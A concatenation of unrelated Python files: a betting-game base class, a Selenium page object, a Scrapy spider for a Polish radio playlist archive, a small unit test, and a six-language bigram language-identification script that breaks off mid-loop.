arr = list(map(int, input('Enter the value of n and m:- ').strip().split()))
n = arr[0]
m = arr[1]
print(countUnvisited(n, m)) |
from player import Player
from playerprovider import PlayerProvider
class BettingGame:
"""A base class for other games to inherit from.
This handles collecting/paying out bets and running rounds.
Base functionality:
collectBet -- handles the interaction with a player to collect their bets.
payBet -- pays the bet to the player. Takes in a decimal multiplier.
Functions for implementers:
initializeGame -- Perform any housekeeping required for the game -setting deck,gathering players etc. Called in initialization.
runRound -- Run a round of the game. This will be called indefinetly until endGame() is called.
"""
players = []
# Override Section
def initializeGame(self):
raise NotImplementedError("Method 'initializeGame' not implemented")
def runRound(self):
raise NotImplementedError("Method 'runRound' not implemented")
# Base Functionality
def collectBet(self, player):
amount = int(input("How much would you like to bet?"))
self.roundBets.append(Bet(player, amount))
print("{name} has wagered {amount}.".format(
name=player.displayName, amount=amount))
def payBet(self, bet, multiplier):
# restore the bet amount, and the multiplier
payout = bet.amount + (bet.amount * multiplier)
bet.player.bank += payout
print("{name} has won {amount}.".format(
name=bet.player.displayName, amount=payout))
def endGame(self):
self.ended = True
def run(self):
print("Beginning game.")
while self.ended != True:
self.roundBets = []
self.runRound()
print("Thanks for playing.")
def __init__(self, playerProvider):
self.playerProvider = playerProvider
self.ended = False
self.initializeGame()
class Bet:
def __init__(self, player, amount):
self.player = player
self.amount = amount
|
from selenium.webdriver.common.by import By
class Purchase_page:
country = (By.ID, "country")
checkbox = (By.CSS_SELECTOR, "label[for='checkbox2']")
confirm_button = (By.CSS_SELECTOR, "input[class*='btn-success']")
success_message = (By.CSS_SELECTOR, "div[class *='alert-success']")
def __init__(self, driver):
self.driver = driver
def enter_country(self):
return self.driver.find_element(*Purchase_page.country)
def click_checkbox(self):
return self.driver.find_element(*Purchase_page.checkbox)
def click_confirm(self):
return self.driver.find_element(*Purchase_page.confirm_button)
def grab_success_message(self):
return self.driver.find_element(*Purchase_page.success_message) |
import logging
from datetime import date, timedelta
from urllib import parse
import scrapy
logging.basicConfig(filename='eska.log', level=logging.DEBUG)
def initialize_start_urls():
BASE_URL = 'http://www.eskarock.pl/archiwum_playlist/'
ONE_DAY = timedelta(days=1)
start_date = date(2010, 9, 1)
END_DATE = date.today()
result = []
while END_DATE >= start_date:
result.append(
BASE_URL + start_date.isoformat()
)
start_date = start_date + ONE_DAY
return result
class EskaSpider(scrapy.Spider):
name = 'eska'
start_urls = initialize_start_urls()
# start_urls = [
# 'http://www.eskarock.pl/archiwum_playlist/2018-10-25',
# ]
def parse(self, response):
date_played = response.url.split('/')[-1]
for li in response.xpath('//div[@id="box-zagrane"]/ul//li'):
title_band = li.xpath('div[@class="txt"]/div[@class="song"]/a')
title = title_band.re_first(r'title="(.+?)"').replace('utwór ', '')
artist = li.xpath(
'div[@class="txt"]/div[@class="author"]/text()').extract_first(default='BRAK!')
time_played = li.xpath(
'div[@class="when"]/b').extract_first().replace('<b>', '').replace('</b>', '')
song_data = {
'title': title,
'artist': artist,
'date_played': date_played,
'time_played': time_played
}
author_page = title_band.re_first(r'href="(.+?)"')
if artist == 'BRAK!':
request = scrapy.Request(
author_page, callback=self.parse_author_page, dont_filter=True)
request.meta['song_data'] = song_data
yield request
else:
yield song_data
def parse_author_page(self, response):
artist = response.xpath(
'//h1[contains(@class, "main-title")]/span/text()').extract_first()
song_data = response.meta['song_data']
song_data['artist'] = artist.strip()
yield song_data
# def make_title_url_like(self, title):
# polish = list('ąęćęłóśżźĄĘĆĘŁÓŚ')
# _ascii = list('aeceloszz')
# for old, new in zip(polish, _ascii + _ascii):
# title = title.replace(old, new)
# title = title.replace(' ', '_')
# return parse.quote(title)
|
import unittest
def remove_duplicates(s: str) -> str:
if len(s) < 2:
return s
result = []
for i in s:
if i not in result:
result.append(i)
return "".join(result)
class TestCase(unittest.TestCase):
def test_case1(self):
self.assertEqual(remove_duplicates("abcd"), "abcd")
def test_case2(self):
self.assertEqual(remove_duplicates("aaaa"), "a")
def test_case3(self):
self.assertEqual(remove_duplicates(""), "")
def test_case4(self):
self.assertEqual(remove_duplicates("aabbcc"), "abc")
if __name__ == "__main__":
unittest.main()
|
from itertools import islice
from io import open
from conllu import parse_incr
import pandas as pd
import numpy as np
from collections import Counter
import string
import math
#for deep copy
import copy
#for commandline input
import sys
#for precision and recall
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
"""
#for debugging
import warnings
import traceback
def warn_with_traceback(message, category, filename, lineno, file=None, line=None):
log = file if hasattr(file,'write') else sys.stderr
traceback.print_stack(file=log)
log.write(warnings.formatwarning(message, category, filename, lineno, line))
warnings.showwarning = warn_with_traceback
warnings.simplefilter("always")
"""
##### STILL NEED TO REMOVE OOV CUTOFF MAYBE
def bigramLaplace(pathToTrainLang1, pathToTrainLang2, pathToTrainLang3, pathToTrainLang4, pathToTrainLang5, pathToTrainLang6
, pathToTuneLang1, pathToTuneLang2, pathToTuneLang3, pathToTuneLang4, pathToTuneLang5, pathToTuneLang6, uniBackoff= .5, biBackoff= .5):
#not error checking the input. presume user inputs correct values below 1 and above 0
uniBackoff = float(uniBackoff)
biBackoff = float(biBackoff)
#removed oov constant implementation
#I am populating some unknown token list with a minimal training set of tokens with frequency one.
#This is because having no probability for unknown tokens is bad form in my opinion and this distributes at least a small probability to <UNK>
#if int(oovConstant)>=1:
# oovFrequency = int(oovConstant)
#else:
# oovFrequency = 1
#get laplace constant from hyperparamters. cannot be 0 or less. should probably be less than 1 for better performance
#if float(laplaceConstant)> 0:
# laplace = float (laplaceConstant)
#else:
# laplace = .1
#open both files
train1 = open(pathToTrainLang1, "r", encoding="utf-8")
train2 = open(pathToTrainLang2, "r", encoding="utf-8")
train3 = open(pathToTrainLang3, "r", encoding="utf-8")
train4= open(pathToTrainLang4, "r", encoding="utf-8")
train5 = open(pathToTrainLang5, "r", encoding="utf-8")
train6 = open(pathToTrainLang6, "r", encoding="utf-8")
#used as temporary storage per each sentence as the connlu parser iterates over them
tempSentence = list()
#list for storing word tokens
list1 = list()
list2 = list()
list3 = list()
list4 = list()
list5 = list()
list6=list()
#at first storing observed bigrams using dictionary
bigramCounts1 = {}
bigramCounts2 = {}
bigramCounts3 = {}
bigramCounts4 = {}
bigramCounts5 = {}
bigramCounts6 = {}
#list for storing sentences which will later be used to update bigram
sentenceList1 = list()
sentenceList2 = list()
sentenceList3 = list()
sentenceList4 = list()
sentenceList5 = list()
sentenceList6 = list()
#word/token counts in order to calculate unigram probabilities and some other things
wordCount1 = 0
wordCount2 = 0
wordCount3 = 0
wordCount4 = 0
wordCount5 = 0
wordCount6 = 0
print("Reading in data from connlu files\n")
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train1):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list1.append(token["form"].lower())
wordCount1+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list1.append("<BOS>")
list1.append("<EOS>")
wordCount1+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList1.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train1.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train2):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list2.append(token["form"].lower())
wordCount2+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list2.append("<BOS>")
list2.append("<EOS>")
wordCount2+=2
#count of sentences in language two used for initial probability
#numSentences2+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList2.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train2.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train3):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list3.append(token["form"].lower())
wordCount3+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list3.append("<BOS>")
list3.append("<EOS>")
wordCount3+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList3.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train3.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train4):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list4.append(token["form"].lower())
wordCount4+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list4.append("<BOS>")
list4.append("<EOS>")
wordCount4+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList4.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train4.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train5):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list5.append(token["form"].lower())
wordCount5+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list5.append("<BOS>")
list5.append("<EOS>")
wordCount5+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList5.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train5.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train6):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list6.append(token["form"].lower())
wordCount6+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list6.append("<BOS>")
list6.append("<EOS>")
wordCount6+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList6.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train6.close()
tempSentence = []
#create dataframe containing all tokens and convert to series of counts per word type.
df1 = pd.DataFrame(list1)
series1= df1[0].value_counts()
df2 = pd.DataFrame(list2)
series2= df2[0].value_counts()
df3 = pd.DataFrame(list3)
series3= df3[0].value_counts()
df4 = pd.DataFrame(list4)
series4= df4[0].value_counts()
df5 = pd.DataFrame(list5)
series5= df5[0].value_counts()
df6 = pd.DataFrame(list6)
series6= df6[0].value_counts()
#setting aside some count of 1 for unknown. smallest possible whole word count
series1.at['<UNK>'] = 1
series2.at['<UNK>'] = 1
series3.at['<UNK>'] = 1
series4.at['<UNK>'] = 1
series5.at['<UNK>'] = 1
series6.at['<UNK>'] = 1
"""
#left in previous code for oov cutoff. using 1 instead of oovfreqency hyperparameter cutoff variable
#decided to not include the feature at this time due to time constraints for evaluating hyperparameters.
#for storing filtered vocab filtered by frequency
filteredList1 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series1.items():
if value > 0:
filteredList1.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList1.at['<UNK>'] = laplace
#####add unknown count to list with token <UNK> as the index
#####I am commenting this out because I am not assigning probability to unknown this way.
#####Instead I will be using laplace constant.
#####filteredList1.at['<UNK>'] = unknownCount
#for storing filtered vocab filtered by frequency
filteredList2 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series2.items():
if value > 0:
filteredList2.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList2.at['<UNK>'] = laplace
#####add unknown count to list with token <UNK> as the index
#####I am commenting this out because I am not assigning probability to unknown this way.
#####Instead I will be using laplace constant.
#####filteredList2.at['<UNK>'] = unknownCount.
#for storing filtered vocab filtered by frequency
filteredList3 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series3.items():
if value > 0:
filteredList3.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList3.at['<UNK>'] = laplace
#for storing filtered vocab filtered by frequency
filteredList4 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series4.items():
if value > 0:
filteredList4.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList4.at['<UNK>'] = laplace
#for storing filtered vocab filtered by frequency
filteredList5 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series5.items():
if value > 0:
filteredList5.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList5.at['<UNK>'] = laplace
#for storing filtered vocab filtered by frequency
filteredList6 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series6.items():
if value > 0:
filteredList6.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList6.at['<UNK>'] = laplace
"""
print("Start of unigram backoff\n")
#store unigram count copy for backoff
backedOffList1 = series1.copy()
backedOffList2 = series2.copy()
backedOffList3 = series3.copy()
backedOffList4 = series4.copy()
backedOffList5 = series5.copy()
backedOffList6 = series6.copy()
#for debugging
#print(backedOffList1)
#perform backoff by backoff constant on every unigram entry
backedOffList1-= uniBackoff
backedOffList2-=uniBackoff
backedOffList3-=uniBackoff
backedOffList4-=uniBackoff
backedOffList5-=uniBackoff
backedOffList6-=uniBackoff
#for debugging
#print(backedOffList1)
#calculate how much value was backed off in total per each language unigram
#this is 1 - sum (c(y) - d1 / count(tokens))
redistributedUnigram1 = (1- (backedOffList1.values.sum()/wordCount1))
redistributedUnigram2 = (1- (backedOffList2.values.sum()/wordCount2))
redistributedUnigram3 = (1- (backedOffList3.values.sum()/wordCount3))
redistributedUnigram4 = (1- (backedOffList4.values.sum()/wordCount4))
redistributedUnigram5 = (1- (backedOffList5.values.sum()/wordCount5))
redistributedUnigram6 = (1- (backedOffList6.values.sum()/wordCount6))
#for debugging
#print(redistributedUnigram1)
#for storing list of words (types) in the vocab which will be used for indexing the rows and columns of the dataframe
wordList1 = series1.keys().tolist()
wordList2 = series2.keys().tolist()
wordList3 = series3.keys().tolist()
wordList4 = series4.keys().tolist()
wordList5 = series5.keys().tolist()
wordList6 = series6.keys().tolist()
#get number of types
sizeOfVocab1=len(wordList1)
sizeOfVocab2=len(wordList2)
sizeOfVocab3=len(wordList3)
sizeOfVocab4=len(wordList4)
sizeOfVocab5=len(wordList5)
sizeOfVocab6=len(wordList6)
print("Creating sparse bigram counts\n")
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList1:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList1:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts1:
bigramCounts1[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts1[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList2:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList2:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts2:
bigramCounts2[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts2[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList3:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList3:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts3:
bigramCounts3[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts3[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList4:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList4:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts4:
bigramCounts4[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts4[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList5:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList5:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts5:
bigramCounts5[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts5[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList6:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList6:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts6:
bigramCounts6[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts6[(wordPair[0], wordPair[1])] = 1.0
print("Start of bigram backoff\n")
#convert these bigram count dictionaries to series so I can subtract from the series in pandas
backedOffBigram1 = pd.Series(bigramCounts1)
backedOffBigram2 = pd.Series(bigramCounts2)
backedOffBigram3 = pd.Series(bigramCounts3)
backedOffBigram4 = pd.Series(bigramCounts4)
backedOffBigram5 = pd.Series(bigramCounts5)
backedOffBigram6 = pd.Series(bigramCounts6)
#dictionary for holding redistributed value for every word. i.e. for holding a(x) = 1 - (∑(c(x,y) - δ2)/( c(x))) for all x words
#start out with value of one and then subtract accordingly
redistributedBigram1 = dict.fromkeys(wordList1, 1.0)
for key, value in backedOffBigram1.items():
#backoff by bigram backoff constant
backedOffBigram1[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram1[tempWordX]-= (backedOffBigram1[key]/series1[tempWordX])
redistributedBigram2 = dict.fromkeys(wordList2, 1.0)
for key, value in backedOffBigram2.items():
#backoff by bigram backoff constant
backedOffBigram2[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram2[tempWordX]-= (backedOffBigram2[key]/series2[tempWordX])
redistributedBigram3 = dict.fromkeys(wordList3, 1.0)
for key, value in backedOffBigram3.items():
#backoff by bigram backoff constant
backedOffBigram3[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram3[tempWordX]-= (backedOffBigram3[key]/series3[tempWordX])
redistributedBigram4 = dict.fromkeys(wordList4, 1.0)
for key, value in backedOffBigram4.items():
#backoff by bigram backoff constant
backedOffBigram4[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram4[tempWordX]-= (backedOffBigram4[key]/series4[tempWordX])
redistributedBigram5 = dict.fromkeys(wordList5, 1.0)
for key, value in backedOffBigram5.items():
#backoff by bigram backoff constant
backedOffBigram5[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram5[tempWordX]-= (backedOffBigram5[key]/series5[tempWordX])
redistributedBigram6 = dict.fromkeys(wordList6, 1.0)
for key, value in backedOffBigram6.items():
#backoff by bigram backoff constant
backedOffBigram6[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram6[tempWordX]-= (backedOffBigram6[key]/series6[tempWordX])
#for debugging
#print(backedOffBigram6)
#print(redistributedBigram6)
####get entire vocab. maybe don't need this code
wordList = wordList1+wordList2+wordList3+wordList4+wordList5+wordList6
#initial probability is using simply count of sentences in one language over total count of sentences
probLang1 = len(sentenceList1) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang2 = len(sentenceList2) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang3 = len(sentenceList3) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang4 = len(sentenceList4) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang5 = len(sentenceList5) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang6 = len(sentenceList6) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
#initial probabilities
print("\nInitial probability of the first language passed to this program:")
print(probLang1)
print("Initial probability of the second language passed to this program:")
print(probLang2)
print("Initial probability of the third language passed to this program:")
print(probLang3)
print("Initial probability of the fourth language passed to this program:")
print(probLang4)
print("Initial probability of the fifth language passed to this program:")
print(probLang5)
print("Initial probability of the sixth language passed to this program:")
print(probLang6)
print("\nEvaluating development or training set on data\n")
#evaluate on dev set (or look at results on test set if you input test set file paths)
en_dev1 = open(pathToTuneLang1, "r", encoding="utf-8")
en_dev2 = open(pathToTuneLang2, "r", encoding="utf-8")
en_dev3 = open(pathToTuneLang3, "r", encoding="utf-8")
en_dev4 = open(pathToTuneLang4, "r", encoding="utf-8")
en_dev5 = open(pathToTuneLang5, "r", encoding="utf-8")
en_dev6 = open(pathToTuneLang6, "r", encoding="utf-8")
tempSentence1 = list()
tempSentence2 = list()
tempSentence3 = list()
tempSentence4 = list()
tempSentence5 = list()
tempSentence6 = list()
#lists for storing predicted languages vs actual langs
predictedLang = []
actualLang = []
#for tracking and printing progress through dev set
countDevLang1=0
countDevLang2=0
countDevLang3=0
countDevLang4=0
countDevLang5=0
countDevLang6=0
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev1):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
